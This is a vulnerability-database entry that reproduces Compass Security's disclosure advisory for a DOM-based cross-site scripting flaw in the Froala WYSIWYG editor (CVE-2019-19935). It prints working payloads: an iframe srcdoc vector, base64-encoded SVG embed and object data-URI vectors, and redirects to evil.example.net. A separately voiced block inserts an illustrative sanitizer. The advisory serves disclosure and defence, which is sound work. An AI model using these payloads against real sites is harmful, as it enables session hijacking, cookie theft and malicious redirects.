Froala WYSIWYG HTML Editor Cross-Site Scripting Vulnerability

Vulnerability ID: 2078842    Vulnerability type: Cross-site scripting
Published: 2020-07-05    Updated: 2020-07-06
CVE ID: CVE-2019-19935

CNNVD ID: CNNVD-202007-229
Platform: N/A    CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2020070024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-229
|Vulnerability details
Froala WYSIWYG HTML Editor is a web-based WYSIWYG rich text editor from the US company Froala.
Froala WYSIWYG HTML Editor versions 3.0.6 through 3.1.1 contain a cross-site scripting vulnerability. The vulnerability stems from the web application not correctly validating client-side data. An attacker can exploit this vulnerability to execute client-side code.
|Exploit / PoC
#####################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#####################################################################
#
# Product:  Froala WYSIWYG HTML Editor
# Vendor:   Froala
# CSNC ID:  CSNC-2020-004
# CVE ID:   CVE-2019-19935
# Subject:  DOM XSS in Froala WYSIWYG HTML Editor
# Severity: Medium
# Effect:   Remotely exploitable
# Author:   Emanuel Duss <emanuel.duss@compass-security.com>
# Date:     2020-07-01
#
#####################################################################

Introduction
------------

Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in
JavaScript that enables rich text editing capabilities for web applications
[1]. Froala sanitizes the user input in order to prevent cross-site scripting
attacks [2].

During a web application penetration test, Compass found a DOM-based cross-site
scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor
is not correctly sanitized when inserted into the DOM. This allows an attacker
that can control the editor content to execute arbitrary JavaScript in the
context of the victim's session.

Affected
--------
* All versions of the Froala WYSIWYG HTML Editor
The issue was found in December 2019 in version 3.0.6 and was still not fixed
in July 2020 in version 3.1.1.

Technical Summary
-----------------

It's possible to perform DOM based XSS in the Froala editor by inserting the
`<iframe>` tag and the `srcdoc` attribute into the editor:

    <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

This can be verified by inserting the payload into the "Code View" of the
editor.

In this case, this would be a self-XSS because the users would only attack
themselves. However, it could be possible that untrusted data from a
non-controlled source is loaded into the editor in order to exploit it. An
example could be a web application where multiple users can edit the same
content using this editor.

An attacker can use this to execute own JavaScript code in the session of the
victim. This can be abused to read the content of the victim's account, use the
session to make further requests to the web application or read the cookies or
web storage.

Technical Details
-----------------

# Correct Behavior

According to the Froala tech support page "Why is the <script> tag being
removed?", the `<script>` tag is removed in order to prevent possible XSS
attacks [2]. Other XSS payloads that use other HTML tags and event handlers are
also removed from the DOM before they are inserted.

This can be verified using a PoC hosted on `poc.example.net` that inserts
potentially untrusted data with a `<script>` tag into the editor:

    <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" rel="stylesheet" type="text/css" />
    <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="stylesheet" type="text/css" />
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script>
    <div id="froala-editor"></div>
    <script>
    let editor = new FroalaEditor('div#froala-editor', {}, function() {
      // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest
      // ("<\/script>" keeps the literal closing tag from ending this inline <script> element in the HTML parser)
      data = "<s>Hello</s><script>console.log(document.domain)<\/script><u>Compass</u>";
      // Inserting untrusted data into the editor
      editor.html.set(data);
      // Show how the untrusted data is embedded into the DOM
      console.log(editor.html.get());
    });
    </script>

The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were
inserted into the DOM but the `<script>` tag was correctly removed (as
expected) and therefore the JavaScript was not executed:

    <p><s>Hello</s><u>Compass</u></p>

The same can be done by inserting an `<img>` tag with an `onerror` event
handler as an XSS vector:

    [...]
    data = "<s>Hello</s><img src=x onerror=console.log(document.domain)><u>Compass</u>";
    [...]

The JavaScript console again shows that the legit HTML tags were inserted and
also the `<img>` tag, but without the used `onerror` event handler. Therefore,
the JavaScript was not executed:

    <p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p>

This shows that it's not possible to load and execute common XSS payloads into
the editor.

# XSS Bypass

I tried every event handler from the awesome PortSwigger XSS cheat sheet [4],
but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML
tag with an attribute that does not start with `on`, which can execute
JavaScript in the origin of the website. This tag was not filtered. It's the
`<iframe>` tag with the `srcdoc` attribute. The `srcdoc` attribute specifies
the HTML content of the page to show in the inline frame [5]. This can be used
to embed JavaScript code. The code runs in the origin of the website where the
iframe is embedded.

Working XSS payload (the inner double quotes are escaped so the line is a valid
JavaScript string literal):

    [...]
    data = "<s>Hello</s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"></iframe><u>Compass</u>";
    [...]

The JavaScript console shows that the `<iframe>` tag with the `srcdoc`
attribute was inserted into the DOM without sanitizing. Also the content of
the iframe with the `<img>` tag and the `onerror` event handler was not
sanitized. Further, the origin on which the PoC website is hosted is printed:

    <p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p>
    poc.example.net

Therefore, this shows that the following XSS payload can be used in order to
inject and execute JavaScript into the DOM, which results in a DOM-based XSS:

    <iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe>

Note: The `<img>` tag with the `onerror` event handler is only the data content
of the `srcdoc` attribute and no code for the browser. This is rendered into
code later when the content of the iframe is built.

The injected JavaScript code runs in the origin of the website where the Froala
editor is running. The next section explains why I mention this explicitly.

XSS with Undefined / Empty Origin
---------------------------------

There are several issues marked as open and fixed in the Froala GitHub
repository regarding XSS [6]. The closed ones are also not fixed at the moment.
However, most of these XSS are running in another origin than the website where
the editor is loaded.

# Example 1

For example, the issue #3270 [7] that is marked as closed and uses an embedded
object (`<embed>` tag) in order to execute JavaScript:

    [...]
    data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">";
    [...]

The base64 decoded payload is an SVG image containing JavaScript:

    <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
    xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
    <script type="text/ecmascript">console.log(document.domain)</script></svg>

The JavaScript console shows that the code is executed but the origin is
`undefined`:

    <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo="></p>
    undefined

# Example 2

Another example is the issue #3039 [8] that is marked as closed and uses the `<object>`
tag to embed HTML / JavaScript code:

    [...]
    data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>";
    [...]

The JavaScript console shows that the code is executed but the origin is empty:

    <p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p>

# Exploiting XSS with Undefined / Empty Origins

Because the origin is not the same as where the PoC is hosted, it's not a
typical XSS where an attacker could read the content of the victim's website,
use the session to make further requests or access the cookies or web storage.

It is however still possible to perform arbitrary redirects to other websites
using the reference to the `window.top.location`:

    [...]
    data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\">'>";
    [...]

This redirects to http://evil.example.net/.

The same applies for the embed tag:

    [...]
    data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">";
    [...]

Decoded base64 payload:

    <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
      <script>window.top.location="http://evil.example.net/"</script>
    </svg>

This also redirects to http://evil.example.net/.

This is not as nice and powerful as the "real" XSS attack from the beginning, but still
something ;-).

Vulnerability Classification
----------------------------

CVSS v3.1 Metrics [9]:

* CVSS Base Score: 6.1
* CVSS Vector:     AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Remediation
-----------

This XSS issue is not fixed. The vendor can't tell any exact release date for a
fixed version.

Therefore, only trusted data or data that is already sanitized should be loaded
into the editor.
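As an added example (my own code, not the advisory's PoC and not Froala's sanitizer), the block below contrasts the two filtering strategies the advisory touches on: `denyListFilter` models the behaviour observed in the editor (only `<script>` elements and `on*` handlers are stripped, so the `srcdoc` payload passes untouched), while `allowListFilter` is the kind of tag/attribute allow-list that should run over untrusted HTML before it reaches `editor.html.set()`. `TAG_RE`, `ATTR_RE`, `ALLOWED` and `safeUrl` are names I chose.

```javascript
// Added example, not code from the Compass advisory or from Froala. A deny-list that
// only strips <script> and on* handlers never looks inside the srcdoc attribute value,
// so the <iframe srcdoc> payload survives; a tag/attribute allow-list drops it.

// One tag per match. Quoted attribute values may contain ">", so the quoted
// alternatives come first; "/" counts as a separator so <EMBED/SRC=...> is parsed.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)((?:[\s\/]+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=>\/]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;

function parseAttrs(raw) {
  return Array.from(raw.matchAll(ATTR_RE), (m) => ({
    name: m[1].toLowerCase(),
    value: m[2] === undefined ? '' : m[2].replace(/^["']|["']$/g, ''),
  }));
}

function serialize(tag, attrs) {
  const quoted = attrs.map((a) => ` ${a.name}="${a.value.replace(/"/g, '&quot;')}"`).join('');
  return `<${tag}${quoted}>`;
}

// Deny-list, as the advisory observed the editor behaving: <script> elements and
// on* attributes are removed, every other tag and attribute is kept as-is.
function denyListFilter(html) {
  return html.replace(TAG_RE, (_, close, name, rawAttrs) => {
    if (name.toLowerCase() === 'script') return '';
    if (close) return `</${name}>`;
    return serialize(name, parseAttrs(rawAttrs).filter((a) => !a.name.startsWith('on')));
  });
}

// Allow-list: only these tags and attributes pass, and href/src must be http(s) or relative.
const ALLOWED = { p: [], s: [], u: [], b: [], i: [], em: [], strong: [], br: [],
                  ul: [], ol: [], li: [], a: ['href'], img: ['src', 'alt'] };

function safeUrl(value) {
  const v = value.replace(/[\t\n\r]/g, '').trim();   // browsers drop these before parsing
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  if (scheme) return /^https?$/i.test(scheme[1]);    // rejects javascript:, data:, vbscript:
  return !v.startsWith('//');                         // relative path, not protocol-relative
}

function allowListFilter(html) {
  return html.replace(TAG_RE, (_, close, name, rawAttrs) => {
    const tag = name.toLowerCase();
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, tag)) return '';  // iframe, embed, object, svg ...
    if (close) return `</${tag}>`;
    return serialize(tag, parseAttrs(rawAttrs).filter((a) =>
      ALLOWED[tag].includes(a.name) && (!['href', 'src'].includes(a.name) || safeUrl(a.value))));
  });
}
```

The tokenizer does not decode HTML entities or repair malformed markup, so this demonstrates the allow-list principle rather than serving as a drop-in sanitizer; a DOM-based sanitizer such as DOMPurify is the right tool in production.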

Timeline
--------

2019-12-05    Discovered vulnerability and informed customer.
2019-12-06    Contacted Froala and asked for security contact. Auto reply received, ticket #15328 opened.
2019-12-09    Asked again, got response. Contact via e-mail (support@froala.com) and ticket number.
2019-12-10    Sent vulnerability details.
2019-12-16    Froala confirmed vulnerability and that all Froala HTML editor versions are affected.
2019-12-19    Informed Froala about the closed XSS GitHub issues that are still not fixed.
2019-12-23    MITRE assigned CVE number CVE-2019-19935.
2019-12-26    Froala tells that this issue has high priority. Issue will be fixed after version 3.1.0.
2020-01-09    Asked Froala for updates on the issue.
2020-01-10    Froala tells that all reported issues will be fixed after version 3.1.1.
2020-02-21    Asked Froala for updates on the issue. No response.
2020-03-09    Asked Froala for updates on the issue.
2020-03-20    Froala tells that issue will be fixed in the next release.
2020-04-21    Asked Froala for updates on the issue.
              Froala denied that there is any XSS issue, even if they confirmed the issue before.
              Delivered a PoC and additional details that demonstrates and explains the issue in detail.
              Froala understands the issue and tells that it will be fixed in the next release
              (no exact release date known but it should be fixed in Q2 of 2020)
2020-05-01    Asked Froala for updates on the issue. Still no release date known.
2020-06-02    Asked Froala for updates on the issue. Still no release date known.
2020-06-23    Asked Froala for updates on the issue. Should be released in July.
2020-07-01    Public disclosure after Q2 has ended and more than 200 days after initial notification.

References
----------

[1] https://froala.com/wysiwyg-editor/
[2] https://wysiwyg-editor.froala.help/hc/en-us/articles/115000428829-Why-is-the-script-tag-being-removed-
[3] https://portswigger.net/web-security/cross-site-scripting/dom-based
[4] https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
[5] https://www.w3schools.com/tags/att_iframe_srcdoc.asp
[6] https://github.com/froala/wysiwyg-editor/issues?q=is%3Aissue+xss
[7] https://github.com/froala/wysiwyg-editor/issues/3270
[8] https://github.com/froala/wysiwyg-editor/issues/3039
[9] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N&version=3.1
|References

Source: packetstormsecurity.com

Link: https://packetstormsecurity.com/files/158300/Froala-WYSIWYG-HTML-Editor-3.1.1-Cross-Site-Scripting.html